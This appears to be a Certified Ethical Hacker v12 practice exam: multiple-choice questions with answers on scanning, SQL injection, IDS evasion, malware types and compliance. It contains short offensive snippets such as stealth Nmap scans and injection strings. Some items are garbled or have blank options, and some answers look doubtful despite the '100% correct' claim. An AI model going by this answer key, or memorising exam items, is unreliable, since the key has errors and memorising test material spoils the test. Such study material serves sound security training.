CEH V12 Exam (Latest 2025/ 2026 Update) Certified Ethical Hacker | Questions and Answers | Grade A| 100% Correct (Verified Answers)

CEH V12 Practice Exam (Latest 2025/ 2026 Update) Certified Ethical Hacker | Questions and Answers | Grade A| 100% Correct (Verified Answers)// ///////////…… Which of the following tools is a command-line vulnerability scanner that scans web servers for dangerous files/CGIs? A) Snort B) Kon-Boot C) John the Ripper D) Nikto Nikto Michael, a technical specialist, discovered that the laptop of one of the employees connecting to a wireless point couldn't access the internet, but at the same time, it can transfer files locally. He checked the IP address and the default gateway. They are both on 192.168.1.0/24. Which of the following caused the problem? A) The laptop is using an invalid IP address B) The laptop and the gateway are not on the same network C) The laptop isn't using a private IP address D) The gateway is not routing to a public IP address The gateway is not routing to a public IP address Josh, a security analyst, wants to choose a tool for himself to examine links between data. One of the main requirements is to present data using graphs and link analysis. Which of the following tools will meet John's requirements? A) Palantir B) Maltego C) Analyst's Notebook D) Metasploit Maltego What describes two-factor authentication for a credit card (using a card and pin)? A) Something you know and something you are B) Something you have and something you know C) Something you are and something you remember D) Something you have and something you are Something you have and something you know Identify a vulnerability in OpenSSL that allows stealing the information protected under normal conditions by the SSL/TLS encryption used to secure the internet? A) SSL/TLS Renegotiation Vulnerability B) POODLE C) Heartbleed Bug D) Shellshock Heartbleed Bug You make a series of interactive queries, choosing subsequent plaintexts based on the information from the previous encryption. What type of attack are you trying to perform? A) Adaptive chosen-plaintext attack B) Ciphertext-only attack C) Known-plaintext attack D) Chosen-plaintext attack Adaptive chosen-plaintext attack Which of the following does not apply to IPsec? A) Provides authentication B) Use key exchange C) Encrypts the payloads D) Work at the Data Link Layer Work at the Data Link Layer Alex, a cybersecurity specialist, received a task from the head to scan open ports. One of the main conditions was to use the most reliable type of TCP scanning. Which of the following types of scanning would Alex use? A) NULL Scan B) Half-open Scan C) TCP Connect/Full Open Scan D) Xmas Scan TCP Connect/Full Open Scan Which of the following Nmap options will you use if you want to scan fewer ports than the default? A) -p B) -sP C) -T D) -F -F You conduct an investigation and finds out that the browser of one of your employees sent malicious request that the employee knew nothing about. Identify the web page vulnerability that the attacker used to attack your employee? A) Cross-Site Request Forgery (CSRF) B) Command Injection Attacks C) File Inclusion Attack D) Hidden Field Manipulation Attack Cross-Site Request Forgery (CSRF) Which of the following program attack both the boot sector and executable files? A) Stealth virus B) Polymorphic virus C) Macro virus D) Multipartite virus Multipartite virus Which of the following is the type of violation when an unauthorized individual enters a building following an employee through the employee entrance? A) Reverse Social Engineering B) Tailgating C) Pretexting D) Announced Tailgating Maria conducted a successful attack and gained access to a linux server. She wants to avoid that NIDS will not catch the succeeding outgoing traffic from this server in the future. Which of the following is the best way to avoid detection of NIDS? A) Protocol Isolation B) Out of band signaling C) Encryption D) Alternate Data Streams Encryption The company "Usual company" asked a cybersecurity specialist to check their perimeter email gateway security. To do this, the specialist creates a specially formatted email message: From: To: Subject: Test message Date: 5/8/2021 11:22 He sends this message over the Internet, and a "Usual company " employee receives it. This means that the gateway of this company doesn't prevent _____. A) Email phishing B) Email harvesting C) Email spoofing D) Email masquerading Email Spoofing How works the mechanism of a Boot Sector Virus? A) Moves the MBR to another location on the Random-access memory and copies itself to the original location of the MBR B) Overwrites the original MBR and only executes the new virus code C) Modifies directory table entries to point to the virus code instead of the actual MBR D) Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR Moves the MBR to another location on the hard disk and copies itself to the original location of the MBR Which of the options presented below is not a Bluetooth attack? A) Bluesnarfing B) Bluesmacking C) Bluejacking D) Bluedriving Bluedriving Determine the type of SQL injection: SELECT * FROM user WHERE name='x' AND userid IS NULL; --'; A) UNION SQL Injection B) End of Line Comment C) Illegal/Logically Incorrect Query D) Tautology End of Line Comment Viktor, a white hat hacker, received an order to perform a penetration test from the company "Test us". He starts collecting information and finds the email of an employee of this company in free access. Viktor decides to send a letter to this email, "". He asks the employee to immediately open the "link with the report" and check it. An employee of the company "Test us" opens this link and infects his computer. Thanks to these manipulations, Viktor gained access to the corporate network and successfully conducted a pentest. What type of attack did Viktor use? A) Eavesdropping B) Piggybacking C) Tailgating D) Social engineering Social Engineering Michael works as a system administrator. He receives a message that several sites are no longer available. Michael tried to go to the sites by URL, but it didn't work. Then he tried to ping the sites and enter IP addresses in the browser and it worked. What problem could Michael identify? A) Traffic is blocked on UDP port 69 B) Traffic is blocked on UDP port 88 C) Traffic is blocked on UDP port 56 D) Traffic is blocked on UDP port 53 Traffic is blocked on UDP port 53 Benjamin performs a cloud attack during the translation of the SOAP message in the TLS layer. He duplicates the body of the message and sends it to the server as a legitimate user. As a result of these actions, Benjamin managed to access the server resources to unauthorized access. A) Cloud Hopper B) Side-channel C) Cloudborne D) Wrapping Wrapping Ivan, an evil hacker, conducts an SQLi attack that is based on True/False questions. What type of SQLi does Ivan use? A) DMS-specific SQLi B) Compound SQLi C) Blind SQLi D) Classic SQLi Blind SQLi Phillip, a cybersecurity specialist, needs a tool that can function as a network sniffer, record network activity, prevent and detect network intrusion. Which of the following tools is suitable for Phillip? A) Nessus B) Cain & Abel C) Snort D) Nmap Snort With which of the following SQL injection attacks can an attacker deface a web page, modify or add data in a database and compromised data integrity? A) Unauthorized access to an application B) Information disclosure C) Compromised Data Integrity D) Loss of data availability Compromised Data Integrity According to the Payment Card Industry Data Security Standard, when is it necessary to conduct external and internal penetration testing? A) At least once every two years and after any significant upgrade or modification B) At least one every three years or after any significant upgrade or modification C) At least twice a year or after any significant upgrade or modification D) At least once a year and after any significant upgrade or modification At least once a year and after any significant upgrade or modification The attacker enters its malicious data into intercepted messages in a TCP session since source routing is disabled. He tries to guess the response of the client and server. What hijacking technique is described in this example? A) TCP/IP B) RST C) Registration D) Blind Blind Which of the following is a logical collection of internet-connected devices such as computers, smartphones or internet of things (IoT) devices whose security has been breached and control ceded to a third party? A) Botnet B) Spear Phishing C) Rootkit D) Spambot Botnet Rajesh, the system administrator analyzed the IDS logs and noticed that when accessing the external router from the administrator's computer to update the router configuration, IDS registered alerts. What type of an alert is this? A) False negative B) True negative C) True positive D) False positive False positive Which of the following requires establishing national standards for electronic health care transactions and national identifiers for providers, health insurance plans, and employers? A) PCI-DSS B) HIPAA C) DMCA D) SOX HIPAA Let's assume that you decided to use PKI to protect the email you will send. At what layer of the OSI model will this message be encrypted and decrypted? A) Session layer B) Application layer C) Presentation layer D) Transport layer Presentation layer Mark, the network administrator, must allow UDP traffic on the host 10.0.0.3 and internet traffic in the host 10.0.0.2. In addition to the main task, he needs to allow all FTP traffic to the rest of the network and deny all other traffic. Mark applies his ACL configuration on the router, and everyone has a problem with accessing FTP. In addition, hosts that are allowed access to the internet cannot connect to it. In accordance with the following configuration, determine what happened on the network? access-list 102 deny tcp any any access-list 104 permit udp host 10.0.0.3 any access-list 110 permit tcp host 10.0.0.2 eq www any access-list 108 permit tcp any eq ftp any A) The ACL 104 needs to be first because its UDP B) The ACL 110 needs to be changed to port 80 C) The ACL for FTP must be before the ACL 110 D) The first ACL is denying all TCP traffic, and the router is ignoring the other ACLs The first ACL is denying all TCP traffic, and the router is ignoring the other ACLs Suppose your company has implemented identify people based on walking patterns and made it part pf physical control access to the office. The system works according to the following principle: The camera captures people walking and identifies employees, and then they must attach their RFID badges to access the office. Which of the following best describes this technology? A) Biological motion cannot be used to identify people B) The solution implements the two factors authentication: physical object and physical characteristic C) The solution will have a high level of false positives D) Although the approach has two phases, it actually implements just one authentication factor The solution implements the two factors authentication: physical object and physical characteristic Which one of the following Google search operators allows restricting results to those from a specific website? A) [site:] B) [link:] C) [inurl:] D) [cache:] [site:] Define Metasploit module used to perform arbitrary, one-off actions such as port scanning, denial of service, SQL injection and fuzzing? A) Payload module B) Auxiliary module C) Exploit module D) NOPS module Auxiliary module Which of the following is a network software suite designed for 802.11 WEP and WPA-PSK keys cracking that can recover keys once enough data packets have been captured? A) Aircrack-ng B) wificracker C) WLAN-crack D) Airgaurd Aircrack-ng What is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program? A) Security testing B) Concolic Testing C) Fuzz testing D) Monkey testing Fuzz testing Which of the following tools is a packet sniffer, network detector and IDS for 802.11(a,b,g,n) wireless LANs? A) Nessus B) Abel C) Kismet D) Nmap Kismet John, a system administrator, is learning how to work with new technology: Docker. He will use it to create a network connection between the container interfaces and its parent host interface. Which of the following network drivers is suitable for John? A) Overlay networking B) Macvlan networking C) Host networking D) Bridge networking Macvlan networking The attacker posted a message and an image on the forum, in which he embedded a malicious link. When the victim clicks on this link, the victim's browser sends an authenticated request to a server. What type of attack did the attacker use? A) Session hijacking B) SQL injection C) Cross-site scripting D) Cross-site request forgery Cross-site request forgery While using your bank's online servicing you notice the following string in the URL bar: http://www.MyPersonalB You observe that if you modify the Damount & Camount values and submit the request, that data on the web page reflect the changes. Which type of vulnerability is present on this site? A) XSS Reflection B) Cookie Tampering C) SQL injection D) Web Parameter Tampering Web parameter tampering The evil hacker Antonio is trying to attack the IoT device. He will use several fake identifies to create a strong illusion of traffic congestion, affecting communication between neighbouring nodes and networks. What kind of attack does Antonia perform? A) Forged malicious device B) Side-channel attack C) Sybil attack D) Exploit kits Sybil attack Which of the following can be designated as "Wireshark for CLI"? A) Nessus B) ethereal C) John the Ripper D) tcpdump tcpdump What is the purpose of the demilitarized zone? A) To scan all traffic coming through the DMZ to the internal network B) To provide a place for a honeypot C) To add protection to network devices D) To add an extra layer of security to an organization's local area network To add an extra layer of security to an organization's local area network Which of the following Nmap's commands allows you to most reduce the probability of detection by IDS when scanning common ports? A) nmap -A --host-timeout 99-T1 B) nmap -sT -O -T0 C) nmap -sT -O -T2 D) nmap -A -Pn nmap -sT -O -T0 Jack sent an email to Jenny with a business proposal. Jenny accepted it and fulfilled all her obligations. Jack suddenly refused his offer when everything was ready and said taht he had never sent an email. Which of the following digital signature properties will help Jenny prove that Jack is lying? A) Authentication B) Non-Repudiation C) Integrity D) Confidentiality Non-Repudiation Identify the standard by the description: A regulation contains a set of guidelines that everyone who processes any electronic data in medicine should adhere to. It includes information on medical practices, ensuring that all necessary measures are in place while saving, accessing, and sharing any electronic medical data to secure patient data. A) FISMA B) HIPAA C) COBIT D) ISO/IEC 27002 HIPAA After several unsuccessful attempts to extract cryptography keys using software methods, Mark is thinking about trying another code-breaking methodology. Which of the following will best suit Mark based on his unsuccessful attempts? A) One-Time Pad B) Frequency Analysis C) Brute-Force D) Trickery and Deceit Trickery and Deceit What is meant by a "rubber-hose" attack in cryptography? A) A backdoor is placed into a cryptographic algorithm by its creator B) Attempting to decrypt ciphertext by making logical assumptions about the contents of the original plain text C) Extraction of cryptographic secrets through coercion or torture D) Forcing the targeted keystream through a hardware-accelerated device such as an ASIC Extraction of cryptographic secrets through coercion or torture Which of the following will allow you to prevent unauthorized network access to local area networks and other information assets by wireless devices? A) AISS B) WIPS C) HIDS D) NIDS WIPS Which of the following cipher is based on factoring the product of two large prime numbers? A) MD5 B) RSA C) RC5 D) SHA-1 RSA Which of the following web application attack inject the special character elements "Carriage Return" and "Line Feed" into the user's input to trick the web server, web application, or user into believing that the current object is terminated and a new object has been initiated? A) HTML injection B) Server-Side JS injection C) CRLF injection D) Log injection CRLF injection Which of the following is an encryption technique where data is encrypted by a sequence of photons that have a spinning trait while travelling from one end to another? A) Elliptic Curve Cryptography B) Quantum Cryptography C) Homomorphic D) Hardware-Based Quantum Cryptography Alex, a cyber security specialist, should conduct a pentest inside the network, while he received absolutely no information about the attacked network. What type of testing will Alex conduct? A) Internal, white-box B) Internal, black-box C) Internal, grey-box D) External, black-box Internal, black-box Which of the following command will help you launch the Computer Management Console from "Run" windows as a local administrator? A) B) C) D) Which of the following SQL injection attack does an attacker usually bypassing user authentication and extract data by using a conditional OR clause so that the condition of the WHERE clause will always be true? A) UNION SQLi B) End-of-Line Comment C) Tautology D) Error-Based SQLi Tautology John, a cybersecurity specialist, received a copy of the event logs from all firewalls, Intrusion Detection Systems (IDS) and proxy servers on a company's network. He tried to match all the registered events in all the logs, and he found that their sequence didn't match. What can cause such a problem? A) The attacker altered events from the logs B) A proper chain of custody was not observed while collecting the logs C) The security breach was a false positive D) The network devices are not all synchronized The network devices are not all synchronized Ivan, a black hat hacker, sends partial HTTP requests to the target web server to exhaust the target server's maximum concurrent connection pool. He wants to ensure that all additional connection attempts are rejected. What type of attack does Ivan implement? A) Spoofed Session Flood B) Slowloris C) HTTP GET/POST D) Fragmentation Slowloris Viktor, the white hat hacker, conducts a security audit. He gains control over a user account and tries to access another account's sensitive information and files. How can he do this? A) Fingerprinting B) Shoulder-Surfing C) Privilege Escalation D) Port Scanning Privilege Escalation Which of the following options represents a conceptual characteristic of an anomaly-based IDS over a signature-based IDS? A) Requires vendor updates for a new threat B) Cannot deal with encrypted network traffic C) Produces less false positives D) Can identify unknown attacks Can identify unknown attacks Based on the following data, you need to calculate the approximate cost of recovery of the system operation per year: The cost of a new hard drive is $300 The chance of a hard drive failure is 1/3 The recovery specialist earns $10/hour Restore the OS and software to the new hard disk - 10 hours Restore the database form the last backup to the new hard disk - 4 hours Assume the EF = 1 (100%), calculate the SLE, ARO, and ALE A) $146 B) $295 C) $440 D) $960 $146 Explanation 1. AV (Asset value) = $300 + (14 * $10) = $440 - the cost of a hard drive plus the work of a recovery person, much would it take to replace 1 asset? 10 hours for resorting the OS and soft + 4 hours for DB restore multiplies by hourly rate of the recovery person. 2. SLE (Single Loss Expectancy) = AV EF (Exposure Factor) = $440 1 = $440 3. ARO (Annual rate of occurrence) = 1/3 (every three years, meaning the probability of occurring during 1 years is 1/3) 4. ALE (Annual Loss Expectancy) = SLE ARO = 0.33 $440 = $145.2 Andrew is conducting a penetration test. He is now embarking on sniffing the target network. What is not available for Andrew when sniffing the network? A) Collecting unencrypted information about usernames and passwords B) Modifying and replaying captured network traffic C) Capturing network traffic for further analysis D) Identifying operating systems, services, protocols, and devices Modifying and replaying captured network traffic Your company has a risk assessment, and according to its results, the risk of a breach in the main company application is 40%. Your cybersecurity department has made changes to the application and requested a re-assessment of the risks. The assessment showed that the risk fell to 12%, with a risk threshold of 20%. Which of the following options would be the best from a business point of view? A) Avoid the risk B) Accept the risk C) Introduce more controls to bring risk to 0% D) Limit the risk Accept the risk Which of the following command-line flags set a stealth scan for Nmap? A) -sM B) -sU C) -sT D) -sS -sS Wireshark is one of the most important tools for a cybersecurity specialist. It is used for network troubleshooting, analysis, software, etc. You often have to work with a packet bytes pane. In what format is the data presented in this pane? A) ASCII only B) Decimal C) Binary D) Hexadecimal Hexadecimal Identify Secure Hashing Algorithm, which produces a 160-bit digest from a message on principles similar to those used in MD4 and MD5? A) SHA-0 B) SHA-2 C) SHA-1 D) SHA-3 SHA-1 Elon plans to make it difficult for the packet filter to determine the purpose of the packet when scanning. Which of the following scanning techniques will Elon use? A) ACK scanning B) SYN/FIN scanning using IP fragments C) ICMP scanning D) IPID scanning SYN/FIN scanning using IP fragments You analyze the logs and see the following output of logs from the machine with the IP address of 192.168.0.132: Time August 21 11:22:06 Port:20 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:08 Port:21 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:11 Port:22 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:14 Port:23 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:15 Port:25 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:19 Port:80 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP Time August 21 11:22:21 Port:443 Source:192.168.0.30 Destination:192.168.0.132 Protocol:TCP What conclusion can you make based on this output? A) Port scan targeting 192.168.0.30 B) Teardrop attack targeting 192.168.0.132 C) Denial of service attack targeting 192.168.0.132 D) Port scan targeting 192.168.0.132 Port scan targeting 192.168.0.132 What is a set of extensions to DNS that provide to DNS clients (resolvers) origin authentication, authenticated denial of existence and data integrity, but not availability or confidentiality? A) Zone tranfer B) Resource records C) Resource tranfer D) DNSSEC DNSSEC The firewall prevents packets from entering the organization through certain ports and applications. What does this firewall check? A) Application layer port numbers and the transport layer headers B) Presentation layer headers and session layer port numbers C) Application layer headers and transport layer port numbers D) Network layer headers and the session layer port numbers Application layer headers and transport layer port numbers Which of the following protocols is used in a VPN for setting up a secure channel between two devices? A) SET B) PPP C) PEM D) IPSEC IPSEC What is a "Collision attack?" A) Collision attacks try to change the hash B) Collision attack on a hash tries to find two inputs producing the same hash value C) Collision attacks attempt to recover information from a hash D) Collision attacks break the hash into several parts, with the same bytes in each part to get the private key Collision attack on a hash tries to find two inputs producing the same hash value You managed to compromise a server with an IP address of10.10.0.5, and you want to get fast a list of all the machines in this network. Which of the following Nmap command will you need? A) nmap -T4 -p 10.10.0.0/24 B) nmap -T4 -r 10.10.1.0/24 C) nmap -T4 -F 10.10.0.0/24 D) nmap -T4 -q 10.10.0.0/24 nmap -T4 -F 10.10.0.0/24 Identify the type of jailbreaking which allows user-level access and does not allow iboot-level access? A) Userland exploit B) iBootrom exploit C) iBoot exploit D) Bootrom exploit Userland exploit Which regulation defines security and privacy controls for all U.S. federal information systems except those related to national security? A) HIPAA B) EU Safe Harbor C) NIST-800-53 D) PCI-DSS NIST-800-53 Which of the following methods is best suited to protect confidential information on your laptop which can be stolen while traveling? A) Hidden folders B) Full disk encryption C) Password protected files D) BIOS password Full disk encryption The evil hacker Ivan has installed a remote access trojan on a host. He wants to be sure that when a victim attempts to go to "" that the user is directed to a phishing site. Which file should Ivan change in this case? A) B B) Sudoers C) Hosts D) Networks Hosts Which of the following UDP ports is usually used by Network Time Protocol (NTP)? A) 19 B) 161 C) 177 D) 123 123 Black hat hacker Ivan wants to implement a man-in-the-middle attack on the corporate network. For this, he connects his router to the network and redirects traffic to intercept packets. What can the administrator do to mitigate the attack? A) Use only static routes in the corporation's network B) Use the Open Shortest Path First (OSPF) C) Redirection of the traffic is not possible without the explicit admin's confirmation D) Add message authentication to the routing protocol Add message authentication to the routing protocol Which of the following layer in IoT architecture helps bridge the gap between two endpoints, such as a device and a client, and carries out message routing, message identification, and subscribing? A) Access Gateway B) internet C) Middleware D) Edge technology Access Gateway Determine the attack by the description: The known-plaintext attack used against DES. This attack causes that encrypting plaintext with one DES key followed by encrypting it with a second DES key is no more secure than using a single key. A) Replay attack B) Traffic analysis attack C) Meet-in-the-middle attack D) Man-in-the-middle attack Meet-in-the-middle attack Often, for a successful attack, hackers very skillfully simulate phishing messages. To do this, they collect the maximum information about the company that they will attack: emails of real employees (including information about the hierarchy in the company), information about the appearance of the message (formatting, logos), etc. What is the name of the stage of the hacker's work? A) Enumeration stage B) Exploration stage C) Reconnaissance stage D) Investigation stage Reconnaissance stage The web development team is holding an urgent meeting, as they has received information from testers about a new vulnerability in their web software. They make an urgent decision to reduce the likelihood of using the vulnerability. The team decides to modify the software requirements to disallow users from entering HTML as input into their web application. Determine the type of vulnerability that the team found? A) Cross-site request forgery vulnerability B) Website defacement vulnerability C) Cross-site scripting vulnerability D) SQL injection vulnerability Cross-site scripting vulnerability John needs to choose a firewall that can protect against SQL injection attacks. Which of the following types of firewalls is suitable for this task? A) Packet firewall B) Web application firewall C) Hardware firewall D) Stateful firewall Web application firewall You know that the application you are attacking is vulnerable to an SQL injection, but you cannot see the result of the injection. You send a SQL query to the database, which makes the database wait before it can react. You can see from the time the database takes to respond, whether a query is true or false. What type of SQL injection did you use? A) Blind SQLi B) Out-of-band SQLi C) Error-based SQLi D) UNION SQLi Blind SQLi You are configuring the connection of a new employee's laptop to join an 802.11 network. The new laptop has the same hardware and software as the laptops of other employees. You used the wireless packet sniffer and found that it shows that the Wireless Access Point (WAP) is not responding to the association requests being sent by the laptop. What can cause this problem? A) The WAP does not recognize the laptop's MAC address B) The laptop is configured for the wrong channel C) The laptop cannot see the SSID of the wireless network D) The laptop is not configured to use DHCP The WAP does not recognize the laptop's MAC address Which of the following is not included in the list of recommendations of PCI Data Security Standards? A) Rotate employees handling credit card transactions on a yearly basis to different departments B) Do not use vendor-supplied defaults for systems passwords and other security parameters C) Protect stored cardholder data D) Encrypt transmission of cardholder data across open, public networks Rotate employees handing credit card transactions on a yearly basis to different departments Which of the following best describes as software firewall? A) Software firewall is placed between the anti-virus application and the IDS components of the operating system B) Software firewall is placed between the router and the networking components of the operating systems C) Software firewall is placed between the desktop and the software components of the operating system D) Software firewall is placed between the normal application and the networking components of the operating system Software firewall is placed between the normal application and the networking components of the operating system Which of the following wireless standard has bandwidth up to 54 Mbit/s and signals in a regulated frequency spectrum around 5 GHz? A) 802.11g B) 802.1n C) 802.11a D) 802.11i 802.11a Identify Bluetooth attack techniques that is used in to send messages to users without the recipient's consent, for example for guerrilla marketing campaigns? A) Bluebugging B) Bluesmacking C) Bluejacking D) Bluesnarfing Bluejacking Why is a penetration test considered to be better than a vulnerability scan? A) The tools used by penetration testers tend to have much more comprehensive vulnerability databases B) Penetration tests are intended to exploit weakness in the architecture of your IT network, while a vulnerability scan does not typically involve active exploitation C) Vulnerability scans only do host discovery and port scanning by default D) A penetration test is often performed by an automated tool, while a vulnerability scan requires active engagement Penetration tests are intended to exploit weakness in the architecture of your IT network, while a vulnerability scan does not typically involve active exploitation What does the flag "-oX" mean in Nmap? A) Run an express scan B) Output the results in truncated format to the screen C) Run an Xmas scan D) Output the results in XML format to a file Outputs the results in XML format to a file For the company, an important criterion is the immutability of the financial reports sent by the financial director to the accountant. They need to be sure that the accountant received the reports and it hasn't been changed. How can this be achieved? A) Financial reports can send the financial statements twice, one by email and the other delivered in USB and the accountant can compare both B) Reports can send to the accountant using an exclusive USB for that document C) Use a hash algorithm in the document once CFO approved the financial statements D) Use a protected excel file Use a hash algorithm in the document once CFO approved the financial statement You have been assigned the task of defending the company from network sniffing. Which of the following is the best option for this task? A) Restrict physical access to the server rooms hosting critical servers B) Use static IP addresses C) Using encryption protocols to secure network connections D) Register all machines MAC addresses in a centralized database Using encryption protocols to secure network communications The attacker tries to take advantage of vulnerability where the application does not verify if the user is authorized to access the internal object via its name or key. Which of the following queries best describes an attempt to exploit an insecure direct object using the name of the valid account "User 1"? A) "GET/restricted/goldtranfer?to=Account&from=1or1=1'HTTP/1.1Host:" B) "GET/restricted/accounts/?name=User1HTTP/1.1Host:" C) "GET/restricted/count("~User1")HTTP/1.1Host:" D) "GET/restricted/rn%00account%00User1%00accessHTTP/1.1Host:" "GET/restricted/accounts/?name=User1 HTTP/1.1Host:" Imagine the following scenario: 1. An attacker created a website with tempting content and banner like: "Do you want to make $10,000 in a month?" 2. The victim clicks to the interesting and attractive content URL 3. The attacker creates a transparent 'iframe' in front of the banner which victim attempts to click. The victim thinks that he clicks the "Do you want to make $10,000 in a month?" banner but actually he clicks the content or UPL that exists in the transparent 'iframe' which is set up by the attacker. What is the name of the attack used in the scenario? A) Session fixation B) HTML injection C) HTTP parameter pollution D) Clickjacking attack Clickjacking attack John, a penetration tester, decided to conduct a SQL injection test. He enters a huge amount of random data and observers changes in output and security loopholes in web applications. What SQL injection testing did John use? A) Function testing B) Fuzzing testing C) Static testing D) Dynamic testing Fuzzing testing Ivan, an evil hacker, is preparing to attack the network of a financial company. To do this, he wants to collect information about the operating systems used on the company's computers. Which of the following techniques will Ivan use to achieve the desired result? A) SSDP Scanning B) Banner Grabbing C) IDLE/IPID Scanning D) UDP Scanning Banner grabbing Which of the following is a protocol that used for querying databases that store the registered users or assignees of an internet resource, such as a domain name, and IP address block or an autonomous system? A) Internet engineering task force B) CAPTCHA C) Internet assigned numbers authority D) WHOIS WHOIS Session splicing is an IDS evasion technique that exploits how some IDSs do not reconstruct sessions before performing patter matching on the data. The idea behind session splicing is to split data between several packets, ensuring that no single packet matches any patterns within an IDS signature. Which tool can be used to perform session splicing attacks? A) Whisker B) tcpsplice C) Burp D) Hydra Whisker Which of the following flags will trigger an Xmas scan? A) -sP B) -sV C) -sA D) -sX -sX Maria is surfing the internet and trying to find information about Super Security LLC. Which process is Maria doing? A) Enumeration B) Scanning C) System Hacking D) Footprinting Footprinting Which of the following is the risk that remains after the amount of risk left over after natural or inherent risks have been reduced? A) Deferred risk B) Inherent risk C) Impact risk D) Residual risk Residual risk What actions should you take if you find that the company that hired you is involved with human trafficking? A) Copy the information to removable media and keep it in case you need it B) Confront the customer and ask her about this C) Stop work and contact the proper legal authorities D) Ignore the information and continue the assessment until the work is done Stop work and contact the proper legal authorities Which of the following best describes code injection? A) Form of attack in which a malicious user gains access to the codebase on the server and inserts new code B) Form of attack in which a malicious user inserts test into a data field interpreted as code C) Form of attack in which a malicious user gets the server to execute arbitrary code using a buffer overflow D) Form of attack in which a malicious user inserts additional code into the JavaScript running in the browser Form of attack in which a malicious user inserts text into a data field interpreted as code What actions should be performed before using a vulnerability scanner for scanning a network? A) Checking if the remote hosts is alive B) Firewall detection C) TCP/IP stack fingerprinting D) TCP/UDP port scanning Checking if the remote host is alive Which of the following is the method of determining the movement of a data packet from an untrusted external host to a protected internal host through a firewall? A) MITM B) Network sniffing C) Firewalking D) Session hijacking Firewalking Rajesh, a system administrator, noticed that some clients of his company were victims of DNS Cache Poisoning. They were redirected to a malicious site when they tried to access Rajesh's company site. What is the best recommendation to deal with such a threat? A) Customer awareness B) Use of security agents on customer's computers C) Use Domain Name System Security Extensions (DNSSEC) D) Use a multi-factor authentication Use Domain Name System Security Extensions (DNSSEC) Ivan, a black hat hacker, tries to call numerous random numbers inside the company, claiming he is from the technical support service. It offers company employee services in exchange for confidential data or login credentials. What method of social engineering does Ivan use? A) Reverse social engineering B) Tailgating C) Quid Pro Quo D) Elicitation Quid Pro Quo Ivan, the black hat hacker, split the traffic into many packets such that no single packet triggers the IDS. Which IDS evasion technique does Ivan use? A) Session splicing B) Low-bandwidth attacks C) Flooding D) Unicode evasion Session splicing Alex, the penetration tester, performs a server scan. To do this, he uses the method where the TCP header is split into many packets so that it becomes difficult to determine what packages are used for. Determine the scanning technique that Alex uses? A) Inverse TCP flag scanning B) ACK flag scanning C) TCP scanning D)IP fragmentation scan IP fragmentation scan What identifies malware by collecting data from protected computers while analyzing it on the provider's infrastructure instead of locally? A) Heuristics-based detection B) Real-time protection C) Cloud-based detection D) Behavioural-based detection Cloud-based detection John performs black-box testing. It tries to pass IRC traffic over port 80/TCP from a compromised web-enabled host during the test. Traffic is blocked, but outbound HTTP traffic does not meet any obstacles. What type of firewall checks outbound traffic? A) Circuit B) Application C) Packet filtering D) Stateful Application John, a pentester, received an order to conduct an internal audit in the company. One of its tasks is to search for open ports on servers. Which of the following methods is the best solution for this task? A) Scan servers with Nmap. B) Telnet to every port on each server. C) Manual scan on each server. D) Scan servers with MBSA. Scan servers with Nmap Which layer 3 protocol allows for end-to-end encryption of the connection? A) SSL B) FTPS C) IPsec D) SFTP IPsec Attacker uses various IDS evasion techniques to bypass intrusion detection mechanisms. At the same time, IDS is configured to detect possible violations of the security policy, including unauthorized access and misuse. Which of the following evasion method depends on the Time-to-Live (TTL) fields of a TCP/IP? A) Unicode evasion B) Insertion attack C) Obfuscation D) Denial-of-service attack Insertion attack Which of the following best describes the "white box testing" methodology? A) Only the external operation of a system is accessible to the transfer B) The internal operation of a system is completely known to the transfer C) Only the internal operation of a system is known to the tester D) The internal operation of a system is only partly accessible to the tester The internal operation of a system is completely known to the tester Which of the following application security testing method of white-box testing, in which only the source code of applications and their components is scanned for determined potential vulnerabilities in their software and architecture? A) SAST B) IAST C) DAST D) MAST SAST Ferdinand installs a virtual communication tower between the two authentic endpoints to mislead the victim. What attack does Ferdinand perform? A) aLTEr B) Aspidistra C) Wi-Jacking D) Sinkhole aLTEr Which of the following option is a security feature on switches that leverages the DHCP snooping database to help prevent man-in-the-middle attacks? A) DAI B) Spanning tree C) DHCP relay D) Port security DAI Which of the following incident handling process phases is responsible for defining rules, employees training, creating a back-up, and preparing software and hardware resources before and incident occurs? A) Preparation B) Containment C) Identification D) Recovery Preparation Rajesh, a network administrator found several unknown files in the root directory of his FTP server. He was very interested in a binary file named "mfs". Rajesh decided to check the FTP server logs and found that the anonymous user account logged in to the server, uploaded the files and ran the script using a function provided by the FTP server's software. Also, he found that "mfs" file is running as a process and it listening to a network port. What kind of vulnerability must exist to make this attack possible? A) Directory traversal B) Privilege escalation C) File system permissions D) Brute force login File system permissions Which of the following characteristics is not true about the Simple Object Access Protocol? A) Exchanges data between web services B) Only compatible with the application protocol HTTP C) Using extensible markup language D) Allows for any programming model Only compatible with the application protocol HTTP Determine what of the list below is the type of honeypots that simulates the real production network of the target organization? A) Hig-interaction honeypots B) Pure honeypots C) Research honeypots D) Low-interaction honeypots Pure honeypots Which type of viruses tries to hide from antivirus programs by actively changing and corrupting the chosen service call interruptions when they are being run? A) Tunneling virus B) Polymorphic virus C) Stealth/Tunneling virus D) Cavity virus Stealth/Tunneling virus alert tcp any any -> 10.199.10.3 21 (msg: "FTP on the network!";) Which system usually uses such a configuration setting? A) FTP server rule B) Firewall IPTable C) IDS D) Router IPTable IDS What are the two main conditions for a digital signature? A) It has to be the same number of characters as a physical signature and must be unique B) Legible and neat C) Unforgeable and authentic D) Unique and have special characters Unforgeable and authentic You need to assess the system used by your employee. During the assessment, you found that compromise was possible through user directories, registries, and other system parameters. Also, you discovered vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors. Which of the following types of vulnerability assessments that you conducted? A) Host-based assessment B) Credentialed assessment C) Distributed assessment D) Database assessment Host-based assessment At which of the following stages of the cyber kill chain does data exfiltration occur? A) Installation B) Weaponization C) Actions on objectives D) Command and control Actions on objectives Identify the correct syntax for ICMP scan on a remote computer using hping2. A) hping2 --set-ICMPP B) hping2 C) hping2 --I D) hping2 -1 hping2 -1 You found that sensitive data, employee usernames, and passwords are shared in plaintext, paving the way for hackers to perform successful 